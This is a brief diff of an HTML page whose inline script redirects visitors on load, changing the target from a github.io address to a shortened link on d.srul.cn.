--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 </head>
 <body>
 <script>
-location.href="https://boo-m.github.io/r2";
+location.href="https://d.srul.cn/BJ5noNX";
 </script>
 </body>
 </html>
